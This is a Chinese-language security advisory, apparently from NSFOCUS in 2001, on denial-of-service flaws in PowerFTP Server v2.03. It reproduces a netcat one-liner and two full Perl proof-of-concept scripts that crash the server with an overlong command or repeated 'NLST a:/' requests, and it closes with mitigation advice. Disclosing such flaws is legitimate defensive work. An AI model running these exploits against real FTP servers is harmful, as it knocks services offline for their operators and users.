首页 -> 安全研究
安全研究
安全漏洞
PowerFTP Server 拒绝服务漏洞
发布日期:2001-11-28
更新日期:2001-11-29
受影响系统:
描述:
PowerFTPServer v2.03
PowerFTP Server是一个Windows平台下的FTP服务器。
该FTP服务器存在多个安全问题,通过发送超长命令或者“NLIST A:/”命令,可能导致FTP服务器崩溃,攻击者可以远程进行拒绝服务攻击。
<*来源:al3x hernandez (al3xhernandez@ureach.com)
链接:http://archives.neohapsis.com/archives/bugtraq/2001-11/0243.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
al3x hernandez (al3xhernandez@ureach.com)提供了如下测试代码:
# perl -e ' for ($i=1;$i<2049;$i++) { print "A";} ' | nc 10.0.0.1 21
220 Personal FTP Server ready
#
Crash system and the admin need restart the service!
------oOo-------------
Exploit Code DoS PowerFTP_Dos.pl
------oOo-------------
#!/usr/bin/perl
# Simple script to send a long 'A^s' command to the server,
# resulting in the ftpd crashing
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x PowerFTP_Dos.pl -s <server>
#
# Example:
#
# perl -x PowerFTP_Dos.pl -s 10.0.0.1
# 220 Personal FTP Server ready
# Crash was successful !
#
use Getopt::Std;
use IO::Socket;
print("\nPowerFTP server v2.03 DoS exploit (c)2001\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");
getopts('s:', \%args);
if(!defined($args{s})){&usage;}
$serv = $args{s};
$foo = "A"; $number = 2048;
$data .= $foo x $number; $EOL="\015\012";
$remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $args{s},
PeerPort => "ftp(21)",
) || die("Unable to connect to ftp port at $args{s}\n");
$remote->autoflush(1);
print $remote "$data". $EOL;
while (<$remote>){ print }
print("\nCrash was successful !\n");
sub usage {die("\nUsage: $0 -s <server>\n\n");}
------oOo-------------
Exploit Code DoS attack floppy remote PowerFTP_floppy.pl
------oOo-------------
#!/usr/bin/perl
#
# Even though the server will deny access, the slow hardware
# will still hang the machine. This program attempts to
# exploit this weakness by sending the 'NLST a:/' command to
# the server
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x PowerFTP_floppy.pl <server> <port> <user> <pass>
#
# Example:
#
# perl -x PowerFTP_floppy.pl 10.0.0.1 21 temp temp
#
use IO::Socket;
print("\nPowerFTP server v2.03 DoS exploit Floppy (c)2001\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");
#$NUMBER_TO_SEND = 3000;
$BUFF = 3000;
if ( scalar @ARGV < 4 ) {
print "Usage: $0 <server> <port> <user> <pass>\n";
exit();
}
$target = $ARGV[ 0 ];
$port = $ARGV[ 1 ];
$username = $ARGV[ 2 ];
$password = $ARGV[ 3 ];
print "Creating socket... ";
$sock = new IO::Socket::INET( PeerAddr => $target,
PeerPort => int( $port ),
Proto => 'tcp' );
die "$!" unless $sock;
print "done.\n";
read( $sock, $buffer, 1 );
print "Sending username...";
print $sock "USER " . $username . "\n";
read( $sock, $buffer, 1 );
print "done.\n";
print "Sending password...";
print $sock "PASS " . $password . "\n";
read( $sock, $buffer, 1 );
print "done.\n";
print "DoS Attack floppy server...";
for( $i = 0; $i < $BUFF; $i++ ) {
print $sock "NLST a:/\n";
read( $sock, $buffer, 1 );
}
print "done.\n";
close( $sock );
exit();
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 换用其它安全的FTP服务器
* 禁止不可信用户访问该FTP服务器
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.cooolsoft.com
浏览次数:3749
严重程度:0(网友投票)
绿盟科技给您安全的保障